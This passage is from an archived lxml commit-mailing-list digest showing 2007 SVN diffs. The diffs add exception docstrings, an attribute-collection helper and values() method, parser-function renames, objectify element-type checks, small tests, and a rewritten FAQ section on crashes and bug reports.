AssertionError: Document does not comply with schema -Error reporting works like for the RelaxNG class:: +Error reporting works as for the RelaxNG class:: >>> log = xmlschema.error_log >>> error = log.last_error Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/xpathxslt.txt (original) +++ lxml/branch/lxml-1.3/doc/xpathxslt.txt Fri Jun 15 11:19:25 2007 @@ -274,11 +274,11 @@ >>> doc = etree.parse(f) >>> result_tree = transform(doc) -By default, XSLT supports all extension functions from libxslt and libexslt -as well as Python regular expressions through the `EXSLT regexp functions`_. +By default, XSLT supports all extension functions from libxslt and libexslt as +well as Python regular expressions through the `EXSLT regexp functions`_. Also see the documentation on `custom extension functions`_ and `document -resolvers`_. There is a separate section on `controlling access`_ to -external documents and resources. +resolvers`_. There is a separate section on `controlling access`_ to external +documents and resources. .. _`EXSLT regexp functions`: http://www.exslt.org/regexp/ .. _`document resolvers`: resolvers.html Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Fri Jun 15 11:19:25 2007 @@ -232,6 +232,29 @@ tree.xmlRemoveProp(c_attr) return 0 +cdef object _collectAttributes(xmlNode* c_node, int collecttype): + """Collect all attributes of a node in a list. Depending on collecttype, + it collects either the name (1), the value (2) or the name-value tuples. 
+ """ + cdef xmlAttr* c_attr + c_attr = c_node.properties + attributes = [] + while c_attr is not NULL: + if c_attr.type == tree.XML_ATTRIBUTE_NODE: + if collecttype == 1: + item = _namespacedName(c_attr) + elif collecttype == 2: + item = _attributeValue(c_node, c_attr) + else: + item = (_namespacedName(c_attr), + _attributeValue(c_node, c_attr)) + + ret = python.PyList_Append(attributes, item) + if ret: + raise + c_attr = c_attr.next + return attributes + cdef object __RE_XML_ENCODING __RE_XML_ENCODING = re.compile( r'^(\s*<\?\s*xml[^>]+)\s+encoding\s*=\s*"[^"]*"\s*', re.U) Modified: lxml/branch/lxml-1.3/src/lxml/classlookup.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/classlookup.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/classlookup.pxi Fri Jun 15 11:19:25 2007 @@ -214,7 +214,7 @@ You can inherit from this class and override the method - lookup(type, doc, namespace, name) + lookup(self, type, doc, namespace, name) to lookup the element class for a node. Arguments of the method: * type: one of 'element', 'comment', 'PI' @@ -237,7 +237,9 @@ lookup = state - if c_node.type == tree.XML_COMMENT_NODE: + if c_node.type == tree.XML_ELEMENT_NODE: + element_type = "element" + elif c_node.type == tree.XML_COMMENT_NODE: element_type = "comment" elif c_node.type == tree.XML_PI_NODE: element_type = "PI" Modified: lxml/branch/lxml-1.3/src/lxml/dtd.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/dtd.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/dtd.pxi Fri Jun 15 11:19:25 2007 @@ -2,12 +2,18 @@ cimport dtdvalid class DTDError(LxmlError): + """Base class for DTD errors. + """ pass class DTDParseError(DTDError): + """Error while parsing a DTD. + """ pass class DTDValidateError(DTDError): + """Error while validating an XML document with a DTD. 
+ """ pass ################################################################################ Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Fri Jun 15 11:19:25 2007 @@ -85,6 +85,9 @@ # module level superclass for all exceptions class LxmlError(Error): + """Main exception base class for lxml. All other exceptions inherit from + this one. + """ def __init__(self, *args): _initError(self, *args) self.error_log = __copyGlobalErrorLog() @@ -106,15 +109,18 @@ # superclass for all syntax errors class LxmlSyntaxError(LxmlError, SyntaxError): - pass - -class DocumentInvalid(LxmlError): + """Base class for all syntax errors. + """ pass class XIncludeError(LxmlError): + """Error during XInclude processing. + """ pass class C14NError(LxmlError): + """Error during C14N serialisation. + """ pass # version information @@ -349,7 +355,7 @@ for prefix, href in nsmap.items(): href_utf = _utf8(href) c_href = _cstr(href_utf) - if prefix is not None: + if prefix is not None and prefix: prefix_utf = _utf8(prefix) c_prefix = _cstr(prefix_utf) else: @@ -747,8 +753,8 @@ return "" % (self.tag, id(self)) def __getitem__(self, Py_ssize_t index): - """Returns the given subelement. - """ + """Returns the subelement at the given position. + """ cdef xmlNode* c_node c_node = _findChild(self._c_node, index) if c_node is NULL: @@ -769,10 +775,10 @@ return [] c = start result = [] - doc = self._doc while c_node is not NULL and c < stop: if _isElement(c_node): - ret = python.PyList_Append(result, _elementFactory(doc, c_node)) + ret = python.PyList_Append( + result, _elementFactory(self._doc, c_node)) if ret: raise c = c + 1 @@ -888,29 +894,34 @@ return _getAttributeValue(self, key, default) def keys(self): - """Gets a list of attribute names. 
The names are returned in an arbitrary - order (just like for an ordinary Python dictionary). + """Gets a list of attribute names. The names are returned in an + arbitrary order (just like for an ordinary Python dictionary). + """ + return _collectAttributes(self._c_node, 1) + + def values(self): + """Gets element attribute values as a sequence of strings. The + attributes are returned in an arbitrary order. """ - return python.PySequence_List( _attributeIteratorFactory(self, 1) ) + return _collectAttributes(self._c_node, 2) def items(self): """Gets element attributes, as a sequence. The attributes are returned in an arbitrary order. """ - return python.PySequence_List( _attributeIteratorFactory(self, 3) ) + return _collectAttributes(self._c_node, 3) def getchildren(self): """Returns all subelements. The elements are returned in document order. """ cdef xmlNode* c_node - cdef _Document doc cdef int ret result = [] - doc = self._doc c_node = self._c_node.children while c_node is not NULL: if _isElement(c_node): - ret = python.PyList_Append(result, _elementFactory(doc, c_node)) + ret = python.PyList_Append( + result, _elementFactory(self._doc, c_node)) if ret: raise c_node = c_node.next @@ -1513,28 +1524,25 @@ return _getAttributeValue(self._element, key, default) def keys(self): - return python.PySequence_List( - _attributeIteratorFactory(self._element, 1) ) + return _collectAttributes(self._element._c_node, 1) def __iter__(self): - return iter(self.keys()) + return iter(_collectAttributes(self._element._c_node, 1)) def iterkeys(self): - return iter(self.keys()) + return iter(_collectAttributes(self._element._c_node, 1)) def values(self): - return python.PySequence_List( - _attributeIteratorFactory(self._element, 2) ) + return _collectAttributes(self._element._c_node, 2) def itervalues(self): - return iter(self.values()) + return iter(_collectAttributes(self._element._c_node, 2)) def items(self): - return python.PySequence_List( - 
_attributeIteratorFactory(self._element, 3) ) + return _collectAttributes(self._element._c_node, 3) def iteritems(self): - return iter(self.items()) + return iter(_collectAttributes(self._element._c_node, 3)) def has_key(self, key): if key in self: @@ -1977,12 +1985,18 @@ ################################################################################ # Validation +class DocumentInvalid(LxmlError): + """Validation error. Raised by all document validators when their + ``assertValid(tree)`` method fails. + """ + pass + cdef class _Validator: "Base class for XML validators." cdef _ErrorLog _error_log def __init__(self): self._error_log = _ErrorLog() - + def validate(self, etree): """Validate the document using this schema. Modified: lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd Fri Jun 15 11:19:25 2007 @@ -104,6 +104,9 @@ # attributes must not be removed during iteration! cdef object iterattributes(_Element element, int keysvalues) + # return the list of all attribute names (1), values (2) or items (3) + cdef object collectAttributes(tree.xmlNode* c_element, int keysvalues) + # set an attribute value on an element # on failure, sets an exception and returns -1 cdef int setAttributeValue(_Element element, key, value) except -1 Modified: lxml/branch/lxml-1.3/src/lxml/extensions.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/extensions.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/extensions.pxi Fri Jun 15 11:19:25 2007 @@ -1,6 +1,8 @@ -# supports for extension functions in XPath and XSLT +# support for extension functions in XPath and XSLT class XPathError(LxmlError): + """Base class of all XPath errors. 
+ """ pass class XPathFunctionError(XPathError): @@ -207,11 +209,10 @@ return for o in obj: if isinstance(o, _Element): - element = <_Element>o #print "Holding element:", element._c_node - self._temp_refs.add(element) + self._temp_refs.add(o) #print "Holding document:", element._doc._c_doc - self._temp_refs.add(element._doc) + self._temp_refs.add((<_Element>o)._doc) def Extension(module, function_mapping, ns=None): @@ -405,7 +406,7 @@ fref = "{%s}%s" % (rctxt.functionURI, rctxt.function) else: fref = rctxt.function - xpath.xmlXPathErr(ctxt, xpath.XML_XPATH_UNKNOWN_FUNC_ERROR) + xpath.xmlXPathErr(ctxt, xpath.XPATH_UNKNOWN_FUNC_ERROR) exception = XPathFunctionError("XPath function '%s' not found" % fref) context._exc._store_exception(exception) Modified: lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi Fri Jun 15 11:19:25 2007 @@ -1,9 +1,13 @@ # module-level API for namespace implementations class LxmlRegistryError(LxmlError): + """Base class of lxml registry errors. + """ pass class NamespaceRegistryError(LxmlRegistryError): + """Error registering a namespace extension. 
+ """ pass cdef object __NAMESPACE_REGISTRIES @@ -75,6 +79,11 @@ name = _utf8(name) return self._get(name) + def __delitem__(self, name): + if name is not None: + name = _utf8(name) + python.PyDict_DelItem(self._entries, name) + cdef object _get(self, object name): cdef python.PyObject* dict_result dict_result = python.PyDict_GetItem(self._entries, name) @@ -99,7 +108,7 @@ return self._entries.iteritems() def clear(self): - self._entries.clear() + python.PyDict_Clear(self._entries) cdef class _ClassNamespaceRegistry(_NamespaceRegistry): "Dictionary-like registry for namespace implementation classes" Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Fri Jun 15 11:19:25 2007 @@ -101,7 +101,12 @@ setPytypeAttributeTag() -# namespace for XML Schema instance +# namespaces for XML Schema +cdef object XML_SCHEMA_NS +XML_SCHEMA_NS = "http://www.w3.org/2001/XMLSchema" +cdef char* _XML_SCHEMA_NS +_XML_SCHEMA_NS = _cstr(XML_SCHEMA_NS) + cdef object XML_SCHEMA_INSTANCE_NS XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" cdef char* _XML_SCHEMA_INSTANCE_NS @@ -1449,7 +1454,7 @@ # StrType does not have a typecheck but is the default anyway, # so just accept it if given as type information if pytype is None: - return pytype + return None value = textOf(c_node) try: pytype.type_check(value) @@ -1459,7 +1464,6 @@ pass return None - def annotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'pytype' attributes. 
@@ -1483,52 +1487,53 @@ NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - pytype = None - value = None - if not ignore: - # check that old value is valid - old_value = cetree.attributeValueFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - if old_value is not None and old_value != TREE_PYTYPE: - dict_result = python.PyDict_GetItem(_PYTYPE_DICT, old_value) - if dict_result is not NULL: - pytype = dict_result - if pytype is not StrType: - # StrType does not have a typecheck but is the default anyway, - # so just accept it if given as type information - pytype = _check_type(c_node, pytype) - - if pytype is None: - # if element is defined as xsi:nil, represent it as None - if cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = NoneType - - if pytype is None: - # check for XML Schema type hint - value = cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") - - if value is not None: - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is not NULL: - pytype = dict_result - - if pytype is None: - # try to guess type - if cetree.findChildForwards(c_node, 0) is NULL: - # element has no children => data class - pytype = _guessPyType(textOf(c_node), StrType) - - if pytype is None: - # delete attribute if it exists - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - else: - # update or create attribute - c_ns = cetree.findOrBuildNodeNs(doc, c_node, _PYTYPE_NAMESPACE) - tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, - _cstr(pytype.name)) + if c_node.type == tree.XML_ELEMENT_NODE: + pytype = None + value = None + if not ignore: + # check that old value is valid + old_value = cetree.attributeValueFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + if old_value is not None and old_value != TREE_PYTYPE: + dict_result = 
python.PyDict_GetItem(_PYTYPE_DICT, old_value) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does not have a typecheck but is the default + # anyway, so just accept it if given as type information + pytype = _check_type(c_node, pytype) + + if pytype is None: + # if element is defined as xsi:nil, represent it as None + if cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": + pytype = NoneType + + if pytype is None: + # check for XML Schema type hint + value = cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + + if value is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) + if dict_result is not NULL: + pytype = dict_result + + if pytype is None: + # try to guess type + if cetree.findChildForwards(c_node, 0) is NULL: + # element has no children => data class + pytype = _guessPyType(textOf(c_node), StrType) + + if pytype is None: + # delete attribute if it exists + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNs(doc, c_node, _PYTYPE_NAMESPACE) + tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, + _cstr(pytype.name)) tree.END_FOR_EACH_ELEMENT_FROM(c_node) def deannotate(element_or_tree, pytype=True, xsi=True): @@ -1546,20 +1551,23 @@ c_node = element._c_node if pytype and xsi: tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - cetree.delAttributeFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if c_node.type == tree.XML_ELEMENT_NODE: + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") tree.END_FOR_EACH_ELEMENT_FROM(c_node) elif pytype: tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - cetree.delAttributeFromNsName( - 
c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + if c_node.type == tree.XML_ELEMENT_NODE: + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) tree.END_FOR_EACH_ELEMENT_FROM(c_node) else: tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - cetree.delAttributeFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if c_node.type == tree.XML_ELEMENT_NODE: + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") tree.END_FOR_EACH_ELEMENT_FROM(c_node) @@ -1570,10 +1578,13 @@ __DEFAULT_PARSER = etree.XMLParser(remove_blank_text=True) __DEFAULT_PARSER.setElementClassLookup( ObjectifyElementClassLookup() ) -cdef object parser -parser = __DEFAULT_PARSER +cdef object objectify_parser +objectify_parser = __DEFAULT_PARSER def setDefaultParser(new_parser = None): + set_default_parser(new_parser) + +def set_default_parser(new_parser = None): """Replace the default parser used by objectify's Element() and fromstring() functions. @@ -1581,16 +1592,16 @@ Call without arguments to reset to the original parser. """ - global parser + global objectify_parser if new_parser is None: - parser = __DEFAULT_PARSER + objectify_parser = __DEFAULT_PARSER elif isinstance(new_parser, etree.XMLParser): - parser = new_parser + objectify_parser = new_parser else: raise TypeError, "parser must inherit from lxml.etree.XMLParser" cdef _Element _makeElement(tag, text, attrib, nsmap): - return cetree.makeElement(tag, None, parser, text, None, attrib, nsmap) + return cetree.makeElement(tag, None, objectify_parser, text, None, attrib, nsmap) ################################################################################ # Module level factory functions @@ -1603,10 +1614,18 @@ NOTE: requires parser based element class lookup activated in lxml.etree! 
""" - return _fromstring(xml, parser) + return _fromstring(xml, objectify_parser) XML = fromstring +cdef object _parse +_parse = etree.parse + +def parse(f, parser=None): + if parser is None: + parser = objectify_parser + return _parse(f, parser) + cdef object _DEFAULT_NSMAP _DEFAULT_NSMAP = { "py": PYTYPE_NAMESPACE, "xsi": XML_SCHEMA_INSTANCE_NS } @@ -1636,6 +1655,8 @@ if the type can be identified. If '_pytype' or '_xsi' are among the keyword arguments, they will be used instead. """ + if nsmap is None: + nsmap = _DEFAULT_NSMAP if attrib is not None: if python.PyDict_Size(_attributes): attrib.update(_attributes) Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Fri Jun 15 11:19:25 2007 @@ -5,9 +5,13 @@ from xmlparser cimport xmlParserCtxt, xmlDict class XMLSyntaxError(LxmlSyntaxError): + """Syntax error while parsing an XML document. + """ pass class ParserError(LxmlError): + """Internal lxml parser error. + """ pass ctypedef enum LxmlParserType: @@ -378,7 +382,7 @@ raise TypeError, "This class cannot be instantiated" self._parser_ctxt = pctxt if pctxt is NULL: - raise ParserError, "Failed to create parser context" + python.PyErr_NoMemory() if pctxt.sax != NULL: # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL @@ -425,9 +429,6 @@ def __get__(self): return self._error_log.copy() - def __dummy(self): - pass - def setElementClassLookup(self, ElementClassLookup lookup = None): """Set a lookup scheme for element classes generated from this parser. 
@@ -597,7 +598,7 @@ raise IOError, message elif ctxt.lastError.message is not NULL: message = (ctxt.lastError.message).strip() - if ctxt.lastError.line >= 0: + if ctxt.lastError.line > 0: message = "line %d: %s" % (ctxt.lastError.line, message) raise XMLSyntaxError, message else: @@ -746,7 +747,15 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(_BaseParser parser=None): +def setDefaultParser(parser=None): + "Deprecated, please use set_default_parser instead." + set_default_parser(parser) + +def getDefaultParser(): + "Deprecated, please use get_default_parser instead." + return get_default_parser() + +def set_default_parser(_BaseParser parser=None): """Set a default parser for the current thread. This parser is used globally whenever no parser is supplied to the various parse functions of the lxml API. If this function is called without a parser (or if it is @@ -760,16 +769,8 @@ parser = __DEFAULT_XML_PARSER __GLOBAL_PARSER_CONTEXT.setDefaultParser(parser) -def getDefaultParser(): - return __GLOBAL_PARSER_CONTEXT.getDefaultParser() - -def set_default_parser(parser): - "Deprecated, please use setDefaultParser instead." - setDefaultParser(parser) - def get_default_parser(): - "Deprecated, please use getDefaultParser instead." 
- return getDefaultParser() + return __GLOBAL_PARSER_CONTEXT.getDefaultParser() ############################################################ ## HTML parser Modified: lxml/branch/lxml-1.3/src/lxml/public-api.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/public-api.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/public-api.pxi Fri Jun 15 11:19:25 2007 @@ -83,6 +83,9 @@ cdef public object iterattributes(_Element element, int keysvalues): return _attributeIteratorFactory(element, keysvalues) +cdef public object collectAttributes(xmlNode* c_element, int keysvalues): + return _collectAttributes(c_element, keysvalues) + cdef public int setAttributeValue(_Element element, key, value) except -1: return _setAttributeValue(element, key, value) Modified: lxml/branch/lxml-1.3/src/lxml/relaxng.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/relaxng.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/relaxng.pxi Fri Jun 15 11:19:25 2007 @@ -2,12 +2,18 @@ cimport relaxng class RelaxNGError(LxmlError): + """Base class for RelaxNG errors. + """ pass class RelaxNGParseError(RelaxNGError): + """Error while parsing an XML document as RelaxNG. + """ pass class RelaxNGValidateError(RelaxNGError): + """Error while validating an XML document with a RelaxNG schema. + """ pass ################################################################################ Modified: lxml/branch/lxml-1.3/src/lxml/sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/sax.py Fri Jun 15 11:19:25 2007 @@ -3,6 +3,8 @@ from etree import XML, Comment, ProcessingInstruction class SaxError(LxmlError): + """General SAX error. 
+ """ pass def _getNsTag(tag): Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Fri Jun 15 11:19:25 2007 @@ -554,6 +554,15 @@ self.assertEquals('\n', self._writeElement(root)) + # ET's Elements have items() and key(), but not values() + def test_attribute_values(self): + XML = self.etree.XML + + root = XML('') + values = root.values() + values.sort() + self.assertEquals(['Alpha', 'Beta', 'Gamma'], values) + # gives error in ElementTree def test_comment_empty(self): Element = self.etree.Element @@ -1589,10 +1598,10 @@ suite.addTests([unittest.makeSuite(ElementIncludeTestCase)]) suite.addTests([unittest.makeSuite(ETreeC14NTestCase)]) suite.addTests( - [doctest.DocFileSuite('../../../doc/api.txt')]) - suite.addTests( [doctest.DocFileSuite('../../../doc/tutorial.txt')]) suite.addTests( + [doctest.DocFileSuite('../../../doc/api.txt')]) + suite.addTests( [doctest.DocFileSuite('../../../doc/parsing.txt')]) suite.addTests( [doctest.DocFileSuite('../../../doc/resolvers.txt')]) Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Fri Jun 15 11:19:25 2007 @@ -13,6 +13,7 @@ from lxml import objectify +XML_SCHEMA_NS = "http://www.w3.org/2001/XMLSchema" XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" XML_SCHEMA_INSTANCE_TYPE_ATTR = "{%s}type" % XML_SCHEMA_INSTANCE_NS XML_SCHEMA_NIL_ATTR = "{%s}nil" % XML_SCHEMA_INSTANCE_NS Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py (original) +++ 
lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py Fri Jun 15 11:19:25 2007 @@ -34,6 +34,9 @@ def test_xslt_elementtree_error(self): self.assertRaises(ValueError, etree.XSLT, etree.ElementTree()) + def test_xslt_input_none(self): + self.assertRaises(TypeError, etree.XSLT, None) + def test_xslt_utf8(self): tree = self.parse(u'\uF8D2\uF8D2') style = self.parse('''\ Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Fri Jun 15 11:19:25 2007 @@ -5,8 +5,9 @@ # module level API functions def clearErrorLog(): - """Clear the global error log. - Note that this log is already bounded to a fixed size.""" + """Clear the global error log. Note that this log is already bound to a + fixed size. + """ __GLOBAL_ERROR_LOG.clear() # dummy function: no debug output at all @@ -148,6 +149,15 @@ def __len__(self): return len(self._entries) + def __contains__(self, error_type): + for entry in self._entries: + if entry.type == error_type: + return True + return False + + def __nonzero__(self): + return bool(self._entries) + def filter_domains(self, domains): """Filter the errors by the given domains and return a new error log containing the matches. Modified: lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi Fri Jun 15 11:19:25 2007 @@ -2,12 +2,18 @@ cimport xmlschema class XMLSchemaError(LxmlError): + """Base class of all XML Schema errors + """ pass class XMLSchemaParseError(XMLSchemaError): + """Error while parsing an XML document as XML Schema. + """ pass class XMLSchemaValidateError(XMLSchemaError): + """Error while validating an XML document with an XML Schema. 
+ """ pass ################################################################################ From scoder at codespeak.net Fri Jun 15 11:26:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:26:56 +0200 (CEST) Subject: [Lxml-checkins] r44275 - in lxml/trunk: . doc src/lxml Message-ID: <20070615092656.F34288290@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:26:56 2007 New Revision: 44275 Modified: lxml/trunk/CHANGES.txt lxml/trunk/doc/FAQ.txt lxml/trunk/src/lxml/objectify.pyx Log: some cleanups according to 1.3 branch Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Fri Jun 15 11:26:56 2007 @@ -63,8 +63,6 @@ * XSLT parsing failed to pass resolver context on to imported documents -* ``ETXPath`` was missing the ``regexp`` keyword argument - * passing '' as XPath namespace prefix did not raise an error * passing '' as namespace prefix in nsmap could be passed through to libxml2 Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Fri Jun 15 11:26:56 2007 @@ -27,7 +27,7 @@ 2.1 Why is lxml not written in Python? 2.2 How can I contribute? 3 Bugs - 3.1 My application crashes! Why does lxml.etree do that? + 3.1 My application crashes! 3.2 I think I have found a bug in lxml. What should I do? 4 Threading 4.1 Can I use threads to concurrently access the lxml API? @@ -277,45 +277,68 @@ Bugs ==== -My application crashes! Why does lxml.etree do that? ----------------------------------------------------- +My application crashes! +----------------------- One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. 
Please report this bug to the `mailing list`_. See the next section on how to do that. +However, there are a few things to try first, to make sure the problem is +really within lxml (or libxml2 or libxslt): -I think I have found a bug in lxml. What should I do? ------------------------------------------------------ - -a) First, you should look at the `current developer changelog`_ to see if this - is a known problem that has already been fixed in the SVN trunk. +a) If your application (or e.g. your web container) uses threads, please see + the FAQ section on threading to check if you touch on one of the + potential pitfalls. + +b) If you are on Mac-OS X, make sure lxml uses the correct libraries. If you + have updated the old system libraries (e.g. through fink), this is best + achieved by building lxml statically to prevent the different library + versions from interfering. If you choose to use a dynamically linked + version, make sure the ``DYLD_LIBRARY_PATH`` environment variable + contains the directory where you installed the libraries. + +In any case, try to reproduce the problem with the latest versions of +libxml2 and libxslt. From time to time, bugs and race conditions are found +in these libraries, so a more recent version might already contain a fix for +your problem. - .. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt -b) If you are using threads, please see the following section to check if - you touch on one of the potential pitfalls. +I think I have found a bug in lxml. What should I do? +----------------------------------------------------- -c) Try to reproduce the problem with the latest versions of libxml2 and - libxslt. From time to time, bugs and race conditions are found in these - libraries, so a more recent version might already contain a fix for your - problem. - -d) Otherwise, we would really like to hear about it. Please report it to the - `mailing list`_ so that we can fix it. 
It is very helpful in this case if - you can come up with a short code snippet that demonstrates your problem. - Please also report the version of lxml, libxml2 and libxslt that you are - using by calling this:: - - from lxml import etree - print "lxml.etree: ", etree.LXML_VERSION - print "libxml used: ", etree.LIBXML_VERSION - print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION - print "libxslt used: ", etree.LIBXSLT_VERSION - print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION +First, you should look at the `current developer changelog`_ to see if this +is a known problem that has already been fixed in the SVN trunk since the +release you are using. + +.. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + +Also, the 'crash' section above has some good advice on what to try to see if +the problem is really in lxml - and not in your setup. Believe it or not, +that happens more often than you might think, especially when old libraries +or even multiple library versions are installed. + +You should always try to reproduce the problem with the latest versions of +libxml2 and libxslt - and make sure they are used (``lxml.etree`` can tell +you what it runs with, see below). + +Otherwise, we would really like to hear about it. Please report it to the +`mailing list`_ so that we can fix it. It is very helpful in this case if +you can come up with a short code snippet that demonstrates your problem. +If others can reproduce and see the problem, it is much easier for them to +fix it - and maybe even easier for you to describe it and get people +convinced that it really is a problem to fix.
Please also report the +version of lxml, libxml2 and libxslt that you are using by calling this:: + + from lxml import etree + print "lxml.etree: ", etree.LXML_VERSION + print "libxml used: ", etree.LIBXML_VERSION + print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION + print "libxslt used: ", etree.LIBXSLT_VERSION + print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION - .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev Threading Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Fri Jun 15 11:26:56 2007 @@ -1694,6 +1694,9 @@ objectify_parser = __DEFAULT_PARSER def setDefaultParser(new_parser = None): + set_default_parser(new_parser) + +def set_default_parser(new_parser = None): """Replace the default parser used by objectify's Element() and fromstring() functions. From scoder at codespeak.net Fri Jun 15 11:47:50 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:47:50 +0200 (CEST) Subject: [Lxml-checkins] r44276 - in lxml/branch/lxml-1.3: . 
